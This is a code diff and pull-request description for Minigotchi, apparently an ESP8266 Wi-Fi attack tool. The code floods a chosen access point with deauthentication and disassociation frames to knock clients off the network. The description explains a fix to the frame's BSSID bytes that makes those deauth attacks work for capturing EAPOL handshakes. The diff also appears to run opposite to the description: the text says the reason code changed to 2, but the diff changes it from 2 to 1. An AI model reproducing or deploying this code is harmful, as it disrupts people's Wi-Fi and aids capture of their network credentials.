-  } else if (rssi < -80) {
-    packetCount *= 2; // weak signal
-  }
-
-  Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
-                             WiFi.channel(Deauth::randomIndex));
-
-  // send the deauth 150 times(ur cooked if they find out)
-  for (int i = 0; i < packetCount; ++i) {
-    if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-        Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      packets++;
-      float pps = packets / (float)(millis() - startTime) * 1000;
-
-      // show pps
-      if (!isinf(pps)) {
-        Serial.print("(>-<) Packets per second: ");
-        Serial.print(pps);
-        Serial.print(" pkt/s");
-        Serial.println(" (AP:" + randomAP + ")");
-        Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
-                                            " pkt/s" + "(AP:" + randomAP + ")");
-      }
-    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      Serial.println("(X-X) Both packets failed to send!");
-      Display::updateDisplay("(X-X)", "Both packets failed to send!");
-    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-               Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      Serial.println("(X-X) Deauthentication failed to send!");
-      Display::updateDisplay("(X-X)", "Deauth failed to send!");
-    } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-      Serial.println("(X-X) Disassociation failed to send!");
-      Display::updateDisplay("(X-X)", "Disassoc failed to send!");
-    } else {
-      Serial.println("(X-X) Unable to calculate pkt/s!");
-      Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
+    int packetCount = basePacketCount + (numDevices * 10);
+    if (rssi > -50) {
+        packetCount /= 2; // strong signal
+    } else if (rssi < -80) {
+        packetCount *= 2; // weak signal
     }
-  }
 
-  Serial.println(" ");
-  Serial.println("(^-^) Attack finished!");
-  Serial.println(" ");
-  Display::updateDisplay("(^-^)", "Attack finished!");
-  running = false;
+    Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
+                               WiFi.channel(Deauth::randomIndex));
+
+    // send the deauth 150 times(ur cooked if they find out)
+    for (int i = 0; i < packetCount; ++i) {
+        if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            packets++;
+            float pps = packets / (float)(millis() - startTime) * 1000;
+
+            // show pps
+            if (!isinf(pps)) {
+                Serial.print("(>-<) Packets per second: ");
+                Serial.print(pps);
+                Serial.print(" pkt/s");
+                Serial.println(" (AP:" + randomAP + ")");
+                Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
+                                       " pkt/s" + "(AP:" + randomAP + ")");
+            }
+        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            Serial.println("(X-X) Both packets failed to send!");
+            Display::updateDisplay("(X-X)", "Both packets failed to send!");
+        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                   Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            Serial.println("(X-X) Deauthentication failed to send!");
+            Display::updateDisplay("(X-X)", "Deauth failed to send!");
+        } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+            Serial.println("(X-X) Disassociation failed to send!");
+            Display::updateDisplay("(X-X)", "Disassoc failed to send!");
+        } else {
+            Serial.println("(X-X) Unable to calculate pkt/s!");
+            Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
+        }
+    }
+
+    Serial.println(" ");
+    Serial.println("(^-^) Attack finished!");
+    Serial.println(" ");
+    Display::updateDisplay("(^-^)", "Attack finished!");
+    running = false;
 }

--- a/minigotchi/deauth.cpp
+++ b/minigotchi/deauth.cpp
@@ -50,9 +50,8 @@ uint8_t Deauth::deauthTemp[26] = {
     0xCC, // BSSID MAC (From)
     /* 22 - 23 */ 0x00,
     0x00, // Fragment & squence number
-    /* 24 - 25 */ 0x02,
-    0x00 // Reason code (2 = INVALID_AUTHENTICATION (Previous authentication no
-         // longer valid))
+    /* 24 - 25 */ 0x01,
+    0x00 // Reason code (1 = unspecified reason)
 };
 
 uint8_t Deauth::deauthFrame[26];
@@ -104,7 +103,11 @@ bool Deauth::broadcast(uint8_t *mac) {
   return true;
 }
 
-void Deauth::printMac(uint8_t *mac) { Serial.println(printMacStr(mac)); }
+void Deauth::printMac(uint8_t *mac) {
+  String macStr = printMacStr(mac);
+  Serial.println(macStr); 
+  Display::updateDisplay("('-')", "AP BSSID: " + macStr);
+}
 
 String Deauth::printHidden(int network) {
   String hidden;
@@ -270,8 +273,6 @@ bool Deauth::select() {
 
     Serial.print("('-') AP BSSID: ");
     printMac(apBssid);
-    Display::updateDisplay("('-')",
-                           "AP BSSID: " + Deauth::printMacStr(apBssid));
 
     Serial.print("('-') AP Channel: ");
     Serial.println(WiFi.channel(Deauth::randomIndex));


### PR DESCRIPTION
I've been playing around with some stuff and noticed I was never getting any EAPOL frames from my network, even after blasting it for a bit with the Minigotchi. After looking into it more, I noticed that the deauth frames had the wrong BSSID in it.
This is because when we insert it into the frame, we call sizeof(apBssid). However since apBssid is a pointer, that will just return 4 instead of the desired 6. As such, the last two parts of the MAC never get copied into the frame, which leaves them as the default 'cc' values.
e.g.:
```
APBSSID: 08:02:8e:e8:6c:8f
DEAUTH FRAME: c0 00 00 00 ff ff ff ff ff ff 08 02 8e e8 cc cc 08 02 8e e8 cc cc 00 00 02 00
```

Then after my fix:
```
APBSSID: 08:02:8e:e8:6c:8f
DEAUTH FRAME: c0 00 00 00 ff ff ff ff ff ff 08 02 8e e8 6c 8f 08 02 8e e8 6c 8f 00 00 02 00 
```

Aside from this:
- Updated deauth frames to specify reason code as 2 (INVALID_AUTHENTICATION)
   * I don't think this is required for it to work, I had just done it during testing but didn't see any strong reason to revert it as other projects seemed to use it as well
- Updated MAC print method to reduce string concatenations
   * Nothing was functionally wrong with what it was doing, but I figured this could be a little cleaner and also reduce memory usage by not doing a bunch of String concats
- Removed unused (?) code
   * I removed line 250-251 since I don't think that was actually serving any purpose, maybe just left over from debugging or something
   * I removed lines 276 - 309 since I don't see any way it's ever going into that, and it didn't really make sense to me as-is. I'll put it back if I'm wrong there though. The 'broadcast' method isn't used now either with the removal of that, but I didn't remove it in case it's ever needed later.